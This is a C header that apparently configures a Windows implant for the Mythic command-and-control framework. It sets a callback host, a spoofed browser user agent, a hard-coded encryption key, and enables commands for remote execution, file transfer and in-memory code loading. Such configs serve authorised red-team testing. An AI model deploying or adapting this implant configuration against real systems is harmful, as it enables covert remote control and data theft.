#ifndef CONFIG_H
#define CONFIG_H

// #define PIC_BUILD
#define PROFILE_MYTHIC_HTTP
#define CONFIG_SLEEP 3
#define CONFIG_SLEEP_JITTER 0
#define CONFIG_HOST L"192.168.0.134"
#define CONFIG_UA L"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
#define CONFIG_POST_URI L"/data"
#define CONFIG_UUID "19a1f463-5389-4e0b-8ad3-9e626b81feae"
#define CONFIG_ENCRYPT_KEY { 0xc0,0x51,0xb0,0xd3,0x98,0xd8,0x85,0x33,0x42,0x13,0xd3,0x4f,0x60,0x2d,0x93,0x34,0x82,0x2a,0x43,0x3a,0x26,0xf0,0x1a,0xef,0x3f,0xdf,0x39,0xd4,0x84,0x55,0x4f,0xf5 }
#define REQUIRE_DLL_NTDLL
#define REQUIRE_DLL_KERNEL32
#define REQUIRE_DLL_WININET
#define REQUIRE_DLL_IPHLPAPI
#define REQUIRE_DLL_ADVAPI32
#define REQUIRE_DLL_WS2_32
#define REQUIRE_DLL_BCRYPT
#define INCLUDE_CMD_EXECUTE
#define INCLUDE_CMD_IPINFO
#define INCLUDE_CMD_MV
#define INCLUDE_CMD_MKDIR
#define INCLUDE_CMD_EXIT
#define INCLUDE_CMD_CP
#define INCLUDE_CMD_LS
#define INCLUDE_CMD_RM
#define INCLUDE_CMD_PWD
#define INCLUDE_CMD_SLEEP
#define INCLUDE_CMD_UPLOAD
#define INCLUDE_CMD_WHOAMI
#define INCLUDE_CMD_AGENTINFO
#define INCLUDE_CMD_CD
#define INCLUDE_CMD_DOWNLOAD
#define INCLUDE_CMD_LISTDRIVES
#define INCLUDE_CMD_HOSTNAME
#define INCLUDE_CMD_PS
#define INCLUDE_CMD_EXECUTE_HBIN
#define INCLUDE_CMD_EXECUTE_BOF
#endif